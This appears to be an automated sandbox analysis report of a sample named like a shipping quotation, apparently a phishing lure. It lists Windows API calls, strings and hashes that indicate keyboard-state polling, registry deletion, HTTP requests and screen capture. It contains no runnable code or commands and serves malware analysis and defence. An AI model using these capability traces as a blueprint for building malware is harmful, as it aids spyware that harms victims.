                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3391685005-4258414348
                                                                            • Opcode ID: ba1e42055c14a13a465adf210195d8c92629b55819f28b20793c3e39842524f0
                                                                            • Instruction ID: fa8fd9e00d2eb3be63764b35febbc94fd365d88d2a2a7450c5a18716cf40fef9
                                                                            • Opcode Fuzzy Hash: ba1e42055c14a13a465adf210195d8c92629b55819f28b20793c3e39842524f0
                                                                            • Instruction Fuzzy Hash: 9CE15535208201DBCB54DF24C450A6AB7E3FF98314F15895DF8969B3A2DB31ED46CB85
                                                                            APIs
                                                                            • GetMenuItemCount.USER32(00701990), ref: 00672F8D
                                                                            • GetMenuItemCount.USER32(00701990), ref: 0067303D
                                                                            • GetCursorPos.USER32(?), ref: 00673081
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0067308A
                                                                            • TrackPopupMenuEx.USER32(00701990,00000000,?,00000000,00000000,00000000), ref: 0067309D
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006730A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                            • String ID: 0
                                                                            • API String ID: 36266755-4108050209
                                                                            • Opcode ID: dbabecb33d5e53f6750ff568547fc344c8a369afcd07eaa865aeb385d71b8092
                                                                            • Instruction ID: 8f40d9c732cf8329e0aef3e86302725dd73b4f74a47c23eb3be46c95c24257e3
                                                                            • Opcode Fuzzy Hash: dbabecb33d5e53f6750ff568547fc344c8a369afcd07eaa865aeb385d71b8092
                                                                            • Instruction Fuzzy Hash: 18712A70644216BFEB218F24CD59FEABF66FF04324F208216F518AA3E0C7B1A950D790
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 006A3EF8
                                                                            • GetDriveTypeW.KERNEL32(?), ref: 006A3FD6
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006A401E
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006A4059
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006A4087
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 1600147383-4113822522
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006C83F2
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006C5BF2), ref: 006C844E
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006C8487
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006C84CA
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006C8501
                                                                            • FreeLibrary.KERNEL32(?), ref: 006C850D
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006C851D
                                                                            • DestroyIcon.USER32(?,?,?,?,?,006C5BF2), ref: 006C852C
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006C8549
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006C8555
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 1446636887-1154884017
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?), ref: 006C6DEB
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006C6E5F
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006C6E81
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006C6E94
                                                                            • DestroyWindow.USER32(?), ref: 006C6EB5
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00630000,00000000), ref: 006C6EE4
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006C6EFD
                                                                            • GetDesktopWindow.USER32 ref: 006C6F16
                                                                            • GetWindowRect.USER32(00000000), ref: 006C6F1D
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006C6F35
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006C6F4D
                                                                              • Part of subcall function 00649944: GetWindowLongW.USER32(?,000000EB), ref: 00649952
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 1652260434-3619404913
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006AC4B0
                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006AC4C3
                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006AC4D7
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 006AC4F0
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 006AC533
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 006AC549
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006AC554
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006AC584
                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006AC5DC
                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006AC5F0
                                                                            • InternetCloseHandle.WININET(00000000), ref: 006AC5FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                            • String ID:
                                                                            • API String ID: 3800310941-3916222277
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 006C8592
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85A2
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85AD
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85BA
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006C85C8
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85D7
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006C85E0
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85E7
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85F8
                                                                            • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,006CFC38,?), ref: 006C8611
                                                                            • GlobalFree.KERNEL32(00000000), ref: 006C8621
                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 006C8641
                                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 006C8671
                                                                            • DeleteObject.GDI32(?), ref: 006C8699
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006C86AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000000), ref: 006A1502
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 006A150B
                                                                            • VariantClear.OLEAUT32(?), ref: 006A1517
                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006A15FB
                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 006A1657
                                                                            • VariantInit.OLEAUT32(?), ref: 006A1708
                                                                            • SysFreeString.OLEAUT32(?), ref: 006A178C
                                                                            • VariantClear.OLEAUT32(?), ref: 006A17D8
                                                                            • VariantClear.OLEAUT32(?), ref: 006A17E7
                                                                            • VariantInit.OLEAUT32(00000000), ref: 006A1823
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                            • API String ID: 1234038744-3931177956
                                                                            APIs
                                                                              • Part of subcall function 006BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BB6F4
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006BB772
                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 006BB80A
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006BB87E
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006BB89C
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 006BB8F2
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006BB904
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 006BB922
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 006BB983
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BB994
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 1742008743-4033151799
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 006B25D8
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006B25E8
                                                                            • CreateCompatibleDC.GDI32(?), ref: 006B25F4
                                                                            • SelectObject.GDI32(00000000,?), ref: 006B2601
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 006B266D
                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006B26AC
                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006B26D0
                                                                            • SelectObject.GDI32(?,?), ref: 006B26D8
                                                                            • DeleteObject.GDI32(?), ref: 006B26E1
                                                                            • DeleteDC.GDI32(?), ref: 006B26E8
                                                                            • ReleaseDC.USER32(00000000,?), ref: 006B26F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-909552448
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006C8D5A
                                                                            • GetFocus.USER32 ref: 006C8D6A
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 006C8D75
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 006C8E1D
                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006C8ECF
                                                                            • GetMenuItemCount.USER32(?), ref: 006C8EEC
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 006C8EFC
                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006C8F2E
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006C8F70
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006C8FA1
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                            • String ID: 0
                                                                            • API String ID: 1026556194-4108050209
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(00701990,000000FF,00000000,00000030), ref: 0069BFAC
                                                                            • SetMenuItemInfoW.USER32(00701990,00000004,00000000,00000030), ref: 0069BFE1
                                                                            • Sleep.KERNEL32(000001F4), ref: 0069BFF3
                                                                            • GetMenuItemCount.USER32(?), ref: 0069C039
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0069C056
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 0069C082
                                                                            • GetMenuItemID.USER32(?,?), ref: 0069C0C9
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0069C10F
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0069C124
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0069C145
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                            • String ID: 0
                                                                            • API String ID: 1460738036-4108050209
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006BCC64
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 006BCC8D
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006BCD48
                                                                              • Part of subcall function 006BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 006BCCAA
                                                                              • Part of subcall function 006BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 006BCCBD
                                                                              • Part of subcall function 006BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006BCCCF
                                                                              • Part of subcall function 006BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006BCD05
                                                                              • Part of subcall function 006BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006BCD28
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 006BCCF3
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2734957052-4033151799
                                                                            Strings
                                                                            • InitializeConditionVariable, xrefs: 00650148
                                                                            • SleepConditionVariableCS, xrefs: 00650154
                                                                            • kernel32.dll, xrefs: 00650133
                                                                            • WakeAllConditionVariable, xrefs: 00650162
                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00650122
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule$CountCriticalInitializeSectionSpin
                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                            • API String ID: 798235881-1714406822
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 0069E6B4
                                                                              • Part of subcall function 0064E551: timeGetTime.WINMM(?,?,0069E6D4), ref: 0064E555
                                                                            • Sleep.KERNEL32(0000000A), ref: 0069E6E1
                                                                            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0069E705
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0069E727
                                                                            • SetActiveWindow.USER32 ref: 0069E746
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0069E754
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0069E773
                                                                            • Sleep.KERNEL32(000000FA), ref: 0069E77E
                                                                            • IsWindow.USER32 ref: 0069E78A
                                                                            • EndDialog.USER32(00000000), ref: 0069E79B
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            APIs
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0069EA5D
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0069EA73
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0069EA84
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0069EA96
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0069EAA7
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: SendString
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 890592661-1007645807
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 0069A012
                                                                            • SetKeyboardState.USER32(?), ref: 0069A07D
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0069A09D
                                                                            • GetKeyState.USER32(000000A0), ref: 0069A0B4
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0069A0E3
                                                                            • GetKeyState.USER32(000000A1), ref: 0069A0F4
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 0069A120
                                                                            • GetKeyState.USER32(00000011), ref: 0069A12E
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0069A157
                                                                            • GetKeyState.USER32(00000012), ref: 0069A165
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0069A18E
                                                                            • GetKeyState.USER32(0000005B), ref: 0069A19C
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00695CE2
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00695CFB
                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00695D59
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00695D69
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00695D7B
                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00695DCF
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00695DDD
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00695DEF
                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00695E31
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00695E44
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00695E5A
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00695E67
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            APIs
                                                                              • Part of subcall function 00648F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00648BE8,?,00000000,?,?,?,?,00648BBA,00000000,?), ref: 00648FC5
                                                                            • DestroyWindow.USER32(?), ref: 00648C81
                                                                            • KillTimer.USER32(00000000,?,?,?,?,00648BBA,00000000,?), ref: 00648D1B
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00686973
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00648BBA,00000000,?), ref: 006869A1
                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00648BBA,00000000,?), ref: 006869B8
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00648BBA,00000000), ref: 006869D4
                                                                            • DeleteObject.GDI32(00000000), ref: 006869E6
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            APIs
                                                                              • Part of subcall function 00649944: GetWindowLongW.USER32(?,000000EB), ref: 00649952
                                                                            • GetSysColor.USER32(0000000F), ref: 00649862
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0069369C
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00693797
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0069380C
                                                                            • GetDlgCtrlID.USER32(?), ref: 0069385D
                                                                            • GetWindowRect.USER32(?,?), ref: 00693882
                                                                            • GetParent.USER32(?), ref: 006938A0
                                                                            • ScreenToClient.USER32(00000000), ref: 006938A7
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00693921
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0069395D
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                            • String ID: %s%u
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0067F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00699717
                                                                            • LoadStringW.USER32(00000000,?,0067F7F8,00000001), ref: 00699720
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0067F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00699742
